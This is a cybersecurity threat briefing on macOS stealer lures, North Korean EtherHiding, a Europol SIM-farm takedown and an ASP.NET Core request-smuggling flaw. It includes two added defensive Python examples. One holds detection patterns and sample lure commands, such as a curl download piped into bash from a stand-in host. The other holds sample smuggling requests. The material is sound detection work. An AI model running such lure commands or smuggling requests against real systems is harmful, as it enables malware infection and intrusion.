
Ankura CTIX FLASH Update - October 21, 2025

Malware Activity


Targeting macOS Users and Cryptocurrency Ecosystems

Recent cyber threats have evolved to target different digital environments with sophisticated methods. For instance, on macOS, hackers are deploying fake websites mimicking popular platforms like Homebrew, LogMeIn, and TradingView. The websites trick users into executing malicious commands in Terminal, which leads to malware infections such as AMOS and Odyssey. These malicious programs are designed to steal sensitive information, including passwords, cryptocurrency data, and personal files, secretly collecting the data and sending it to remote attackers. The malware gains root access, manipulates system processes, and remains hidden to avoid detection. Meanwhile, a North Korean threat group has adopted a novel tactic called EtherHiding, which involves embedding malware within blockchain-based smart contracts. This approach leverages the decentralized and pseudonymous nature of blockchain to evade detection and make takedown efforts difficult. The campaign targets cryptocurrency developers through social engineering, including fake job offers and malware disguised as legitimate software, and has resulted in multiple cryptocurrency thefts. These developments highlight the increasing sophistication of cybercriminals in exploiting both traditional and emerging technologies to carry out data theft and financial crimes. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
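The "paste this into Terminal" lure described above is hard to spot after the fact because the legitimate Homebrew installer is itself a download-and-run one-liner. The following is an added example, not code from Ankura or from any of the products named above: a small triage scanner for macOS shell history or EDR command-line telemetry that flags the generic command shapes such lures rely on (a remote script fed straight to a shell, base64 decoded into a shell, removal of the quarantine attribute, an AppleScript privilege prompt) and downgrades hits whose download hosts are on an operator-maintained allowlist. The indicator patterns, the allowlist, and the sample history lines are constructed for the example and are not indicators from the AMOS or Odyssey campaigns.

```python
"""Triage scanner for macOS command-line telemetry (added example, not from the briefing)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Hosts an organisation has vetted for download-and-run installers.
# Constructed allowlist for this example; maintain your own.
ALLOWED_HOSTS = {"raw.githubusercontent.com"}


@dataclass(frozen=True)
class Indicator:
    name: str
    severity: str          # "low" | "medium" | "high"
    pattern: re.Pattern[str]


# Generic shapes of a paste-into-Terminal lure. These are illustrative, not campaign IoCs.
INDICATORS = (
    # curl/wget output piped into a shell, or "sh -c $(curl ...)" command substitution
    Indicator("remote script executed by shell", "high",
              re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"
                         r"|\b(ba|z)?sh\b\s+-c\s+[\"']?\$\(\s*(curl|wget)\b")),
    # a base64 blob decoded and handed to a shell
    Indicator("base64 payload decoded into shell", "high",
              re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # clearing the Gatekeeper quarantine attribute from a downloaded app
    Indicator("quarantine attribute removed", "medium",
              re.compile(r"\bxattr\s+-[a-zA-Z]*c\b|com\.apple\.quarantine")),
    # AppleScript used to raise a password prompt for a shell command
    Indicator("AppleScript administrator prompt", "medium",
              re.compile(r"\bosascript\b.*with administrator privileges")),
)

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}
URL_RE = re.compile(r"https?://[^\s\"'|)]+")


@dataclass(frozen=True)
class Finding:
    line_no: int
    command: str
    indicators: tuple[str, ...]
    severity: str


def url_hosts(cmd: str) -> set[str]:
    """Hostnames of every URL that appears in the command line."""
    return {urlparse(u).hostname or "" for u in URL_RE.findall(cmd)}


def scan_command(cmd: str, line_no: int = 0) -> Finding | None:
    """Return a Finding if any indicator matches, else None.

    A hit whose download hosts are all allowlisted is kept but reported as
    low severity, since a real Homebrew install has the same shape."""
    hits = [i for i in INDICATORS if i.pattern.search(cmd)]
    if not hits:
        return None
    severity = max((i.severity for i in hits), key=SEVERITY_RANK.__getitem__)
    hosts = url_hosts(cmd)
    if hosts and hosts <= ALLOWED_HOSTS:
        severity = "low"
    return Finding(line_no, cmd, tuple(i.name for i in hits), severity)


def scan_history(lines: list[str]) -> list[Finding]:
    """Scan a list of command lines (e.g. ~/.zsh_history entries) in order."""
    findings = []
    for n, cmd in enumerate(lines, start=1):
        finding = scan_command(cmd, n)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample history: two benign lines, the genuine Homebrew installer,
# then three lines shaped like a lure. brew-update.example is a reserved example domain.
SAMPLE_HISTORY = [
    "git status",
    "brew install wget",
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "curl -fsSL https://brew-update.example/install.sh | bash",
    "echo 'aGVsbG8=' | base64 -D | sh",
    "xattr -c ~/Downloads/TradingView.app",
    "ls -la",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no} [{f.severity}] {', '.join(f.indicators)}: {f.command}")
```

The point of the allowlist step is the caveat a defender needs here: the pattern alone cannot separate the real Homebrew command from a look-alike, only the host can, so a hit on an unvetted host is what deserves a human look.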


Threat Actor Activity


Europol Disrupts Massive Criminal SIM Farm Network in Operation SIMCARTEL

Europol's coordinated law enforcement operation, dubbed Operation SIMCARTEL, has successfully disrupted a sophisticated cybercrime-as-a-service (CaaS) platform operating a SIM farm. This platform allowed criminals worldwide to use phone numbers registered to others for various cybercrimes, including phishing, smishing, extortion, investment fraud, and other fraudulent schemes. The operation resulted in the arrest of seven (7) individuals, including five (5) Latvian nationals, and the seizure of 1,200 SIM box devices containing 40,000 active SIM cards. Authorities from Austria, Estonia, Finland, and Latvia participated in the operation, dismantling five (5) servers and seizing two (2) websites promoting the illegal services. The platform enabled the creation of more than 49 million online accounts, facilitating cyber fraud cases that caused financial losses of approximately €5 million ($5.8 million) in Austria and Latvia. The SIM cards, bought from nearly eighty (80) countries, were used to create fake social media accounts, obscuring identities for criminal activities. Europol highlighted the network's technical sophistication and its global impact, emphasizing that the investigation is ongoing to uncover the full extent of the network.


Vulnerabilities


Microsoft Patches Highest-Ever Rated ASP.NET Core Vulnerability

Microsoft has released patches for a critical HTTP request smuggling vulnerability affecting the Kestrel web server in ASP.NET Core, carrying the highest CVSS score ever assigned to the framework, 9.9 out of 10. The flaw, tracked as CVE-2025-55315, allows attackers to embed a hidden HTTP request within another, potentially bypassing authentication, hijacking user credentials, leaking sensitive data, tampering with files, or triggering denial-of-service (DoS) conditions. The vulnerability’s real-world impact depends heavily on how each application is developed and deployed, particularly whether reverse proxies strip smuggled requests and whether proper validation checks exist. Microsoft’s security program manager Barry Dorrans emphasized that, while the worst-case scenario involves a full security feature bypass enabling privilege escalation or injection attacks, exploitation is unlikely unless applications contain flawed request-handling logic. The vulnerability affects all supported ASP.NET Core versions, including 2.3, 8.0, 9.0, and the 10.0 pre-release, as well as Visual Studio 2022 (versions 17.10–17.14). CTIX analysts urge immediate patching via .NET updates or by upgrading to Kestrel.Core version 2.3.6, noting that the vulnerability is not yet known to have been exploited but poses serious risk if left unmitigated.
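Whether a smuggled request reaches the application depends, as the briefing notes, on whether the reverse proxy in front of Kestrel strips ambiguous framing. The following is an added example, not code from Ankura, Microsoft or the ASP.NET Core project: a checker for the header ambiguities that HTTP/1.1 request smuggling relies on in general (Content-Length alongside Transfer-Encoding, conflicting or non-numeric Content-Length values, a Transfer-Encoding that does not end in `chunked`, header names padded with whitespace, folded header lines), of the kind a proxy or WAF rule applies before forwarding. It does not model the specific parsing defect behind CVE-2025-55315, and the sample requests are constructed.

```python
"""Checker for ambiguous HTTP/1.1 request framing (added example, not from the briefing)."""
from __future__ import annotations

from dataclasses import dataclass, field


@dataclass
class SmugglingVerdict:
    ambiguous: bool
    reasons: list[str] = field(default_factory=list)


def parse_headers(raw: bytes) -> tuple[str, list[tuple[str, str]], list[bytes]]:
    """Split a raw request into request line, (name, value) pairs and malformed lines.

    Header names are kept un-normalised so whitespace tricks stay visible;
    lines that are folded (leading SP/HTAB) or lack a colon are returned separately."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers: list[tuple[str, str]] = []
    malformed: list[bytes] = []
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if line[:1] in (b" ", b"\t") or not colon:
            malformed.append(line)
            continue
        headers.append((name.decode("latin-1"), value.decode("latin-1").strip()))
    return request_line, headers, malformed


def check_request(raw: bytes) -> SmugglingVerdict:
    """Report every reason two HTTP parsers could disagree on where this request ends."""
    reasons: list[str] = []
    _request_line, headers, malformed = parse_headers(raw)

    if malformed:
        reasons.append(f"folded or colon-less header lines: {malformed!r}")

    # "Content-Length : 5" is a classic way to make one parser see the header and another not.
    odd_names = [n for n, _ in headers if n != n.strip()]
    if odd_names:
        reasons.append(f"header name with surrounding whitespace: {odd_names!r}")

    cl = [v for n, v in headers if n.strip().lower() == "content-length"]
    te = [v for n, v in headers if n.strip().lower() == "transfer-encoding"]

    if cl and te:
        # RFC 9112 section 6.3: Transfer-Encoding wins, the message may indicate
        # smuggling, and a proxy must drop Content-Length before forwarding.
        reasons.append("Content-Length and Transfer-Encoding both present")
    if len(set(cl)) > 1:
        reasons.append(f"conflicting Content-Length values: {cl!r}")
    for v in cl:
        if not v.isdigit():
            reasons.append(f"non-numeric Content-Length: {v!r}")
    for v in te:
        codings = [c.strip().lower() for c in v.split(",")]
        if codings[-1] != "chunked":
            # e.g. "xchunked" or "chunked, identity": parsers differ on whether chunking applies
            reasons.append(f"Transfer-Encoding does not end in 'chunked': {v!r}")

    return SmugglingVerdict(bool(reasons), reasons)


# Constructed sample requests; app.example is a reserved example host.
SAMPLES = {
    "clean": (b"POST /api/login HTTP/1.1\r\nHost: app.example\r\nContent-Length: 13\r\n"
              b"Content-Type: application/json\r\n\r\n{\"u\":\"alice\"}"),
    "cl_and_te": (b"POST /api/login HTTP/1.1\r\nHost: app.example\r\nContent-Length: 5\r\n"
                  b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n"),
    "duplicate_cl": (b"POST /api/login HTTP/1.1\r\nHost: app.example\r\nContent-Length: 5\r\n"
                     b"Content-Length: 9\r\n\r\nu=alice"),
    "obfuscated_te": (b"POST /api/login HTTP/1.1\r\nHost: app.example\r\n"
                      b"Transfer-Encoding: xchunked\r\n\r\n0\r\n\r\n"),
    "spaced_name": (b"POST /api/login HTTP/1.1\r\nHost: app.example\r\n"
                    b"Content-Length : 7\r\n\r\nu=alice"),
    "folded": (b"POST /api/login HTTP/1.1\r\nHost: app.example\r\nContent-Length: 7\r\n"
               b" Transfer-Encoding: chunked\r\n\r\nu=alice"),
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        verdict = check_request(req)
        print(f"{name:14s} ambiguous={verdict.ambiguous} {verdict.reasons}")
```

The useful property of a check like this at the proxy is that it rejects the whole class of framing disagreements rather than one known back-end bug, which is exactly the layer the briefing says determines whether this CVE is reachable in a given deployment.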



© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.

Tags

report, cybersecurity & data privacy, data & technology, cyber response, data privacy & cyber risk
